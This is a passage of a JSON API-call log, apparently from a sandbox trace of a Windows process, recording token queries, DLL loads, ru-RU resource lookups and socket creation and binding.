                "name": "TokenInformation",
                "value": "\\xf0\\xb4\\xd4\\x05\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1341
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6ec0",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1342
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f0e",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": "\\xa8\\xd3\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1343
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f37",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1344
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f8f",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": "H\\xac\\xd4\\x05\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00"
              }
            ],
            "repeated": 0,
            "id": 1345
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d7048",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00u\\xad\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00 \\xdc\\x15\\x07\\x00\\x00\\x00\\x00\\x18\\xdc\\x15\\x07\\x00\\x00\\x00\\x00\\xe8\\xdb\\x15\\x07\\x00\\x00\\x00\\x00\\x08\\xdc\\x15\\x07"
              }
            ],
            "repeated": 0,
            "id": 1346
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d707b",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xac\\xd4\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x08\\xda\\x15\\x07\\x00\\x00\\x00\\x00\\x90\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7"
              }
            ],
            "repeated": 0,
            "id": 1347
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34ed41f",
            "parentcaller": "0x7ffee34a99ff",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "P\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x98\\xe2\\x15\\x07\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x81i\\x02!"
              }
            ],
            "repeated": 0,
            "id": 1348
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34ed48d",
            "parentcaller": "0x7ffee34a99ff",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "2"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1349
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34ed4da",
            "parentcaller": "0x7ffee34a99ff",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "2"
              },
              {
                "name": "TokenInformation",
                "value": "\\x0e\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x9c\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xac\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\xbc\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\r\\x00\\x00\\x00\\xd4\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xec\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xe7\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\xc0\\xfe\\x7f\\x00\\x00\\x0c\\xe8\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\xe8\\xd3\\x05\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\xe8\\xd3\\x05\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f"
              }
            ],
            "repeated": 0,
            "id": 1350
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee3350e27",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              }
            ],
            "repeated": 0,
            "id": 1351
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee3350e49",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1352
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34b3f7a",
            "parentcaller": "0x7ffee3350ed7",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1353
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee22cb9b2",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\fwpuclnt"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed8cb0000"
              }
            ],
            "repeated": 0,
            "id": 1354
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee22cb9b2",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\FWPUCLNT.DLL"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8cb0000"
              }
            ],
            "repeated": 0,
            "id": 1355
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee22cb9b2",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffed8cb0000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\fwpuclnt.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1356
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffee22cb9e9",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "fwpuclnt.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffed8cb0000"
              },
              {
                "name": "FunctionName",
                "value": "NamespaceCallout"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffed8cb2900"
              }
            ],
            "repeated": 0,
            "id": 1357
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee110026b",
            "parentcaller": "0x7ffed8cb35f2",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x000004a8"
              }
            ],
            "repeated": 0,
            "id": 1358
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffed8cb361f",
            "parentcaller": "0x7ffed8cb2c4c",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1359
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffed8cb363d",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004a8"
              }
            ],
            "repeated": 0,
            "id": 1360
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d4d000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1361
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee34b3f7a",
            "parentcaller": "0x7ffee3350ed7",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1362
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee10bf84f",
            "parentcaller": "0x7ffed8cb2752",
            "category": "synchronization",
            "api": "NtOpenEvent",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b0"
              },
              {
                "name": "EventName",
                "value": "Global\\BFE_Notify_Event_{84bd6d5b-b916-4f9f-a15b-b1c01c01482a}"
              }
            ],
            "repeated": 0,
            "id": 1363
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffed8cb2d61",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b0"
              }
            ],
            "repeated": 0,
            "id": 1364
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee22c4f08",
            "parentcaller": "0x7ffee22c739f",
            "category": "network",
            "api": "socket",
            "status": true,
            "return": "0x000004b0",
            "arguments": [
              {
                "name": "af",
                "value": "23",
                "pretty_value": "AF_INET6"
              },
              {
                "name": "type",
                "value": "2",
                "pretty_value": "SOCK_DGRAM"
              },
              {
                "name": "protocol",
                "value": "0"
              },
              {
                "name": "socket",
                "value": "1200"
              }
            ],
            "repeated": 0,
            "id": 1365
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee0265419",
            "parentcaller": "0x7ffee22c54fa",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000103",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004b0"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\Afd"
              },
              {
                "name": "IoControlCode",
                "value": "0x000120bf",
                "pretty_value": "IOCTL_AFD_DEFER_ACCEPT"
              },
              {
                "name": "InputBuffer",
                "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19\\x00\\x00\\xc8\\x01\\x00\\x00\\x00\\xa0\\xd3\\x98\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "OutputBuffer",
                "value": "\\x02\\x00\\x00\\x00?\\x00\\\\x00@\\x85\\x98\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00d\\x00o\\x00\\\\x85\\x98\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1366
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee02680fc",
            "parentcaller": "0x7ffee02654a3",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000046c"
              },
              {
                "name": "Milliseconds",
                "value": "18446744073709551615"
              },
              {
                "name": "Status",
                "value": "Infinite"
              }
            ],
            "repeated": 0,
            "id": 1367
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "3408",
            "caller": "0x7ffee22c4f8a",
            "parentcaller": "0x7ffee22c739f",
            "category": "network",
            "api": "closesocket",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1200"
              }
            ],
            "repeated": 0,
            "id": 1368
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffec77b1ce0",
            "parentcaller": "0x7ffec77b1bc8",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1369
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffec77b0ac2",
            "parentcaller": "0x7ffec77af117",
            "category": "network",
            "api": "WSASocketW",
            "status": true,
            "return": "0x000004a8",
            "arguments": [
              {
                "name": "af",
                "value": "2",
                "pretty_value": "AF_INET"
              },
              {
                "name": "type",
                "value": "1",
                "pretty_value": "SOCK_STREAM"
              },
              {
                "name": "protocol",
                "value": "6",
                "pretty_value": "IPPROTO_TCP"
              },
              {
                "name": "socket",
                "value": "1192"
              }
            ],
            "repeated": 0,
            "id": 1370
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffec77b0b3b",
            "parentcaller": "0x7ffec77af117",
            "category": "network",
            "api": "setsockopt",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              },
              {
                "name": "level",
                "value": "0x7ffe0000ffff"
              },
              {
                "name": "optname",
                "value": "0x00003007"
              },
              {
                "name": "optval",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1371
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffec77b0b82",
            "parentcaller": "0x7ffec77af117",
            "category": "network",
            "api": "bind",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              },
              {
                "name": "ip",
                "value": "0.0.0.0"
              },
              {
                "name": "port",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1372
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffec77b0bb8",
            "parentcaller": "0x7ffec77af117",
            "category": "network",
            "api": "setsockopt",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              },
              {
                "name": "level",
                "value": "0x7ffe00000006"
              },
              {
                "name": "optname",
                "value": "0x00000001"
              },
              {
                "name": "optval",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1373
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee10b30ce",
            "parentcaller": "0x7ffee22c9653",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1374
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee10b30ce",
            "parentcaller": "0x7ffee22c9653",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000003a8"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1375
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d52000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1376
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee10b30ce",
            "parentcaller": "0x7ffee22c9653",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1377
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee10b30ce",
            "parentcaller": "0x7ffee22c9653",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000003a8"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1378
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee22d0ed8",
            "parentcaller": "0x7ffee22d0d4d",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffee0260000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\mswsock.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000022"
              }
            ],
            "repeated": 0,
            "id": 1379
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34a84c4",
            "parentcaller": "0x7ffee34bd136",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 1380
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb2a",
            "parentcaller": "0x7ffee34bb99e",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004b0"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\mswsock.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1381
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb82",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x000004b0"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\mswsock.dll.mui"
              }
            ],
            "repeated": 0,
            "id": 1382
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbcc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b4"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02f00000"
              },
              {
                "name": "SectionOffset",
                "value": "0x06d5da60"
              },
              {
                "name": "ViewSize",
                "value": "0x00004000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1383
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbdc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b4"
              }
            ],
            "repeated": 0,
            "id": 1384
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee22d0ed8",
            "parentcaller": "0x7ffee22d0d4d",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffee0260000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\mswsock.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000022"
              }
            ],
            "repeated": 4,
            "id": 1385
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee22d0ed8",
            "parentcaller": "0x7ffee22d0d4d",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x02f10002",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\wshqos.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000022"
              }
            ],
            "repeated": 0,
            "id": 1386
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34a84c4",
            "parentcaller": "0x7ffee34bd136",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 1387
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb2a",
            "parentcaller": "0x7ffee34bb99e",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
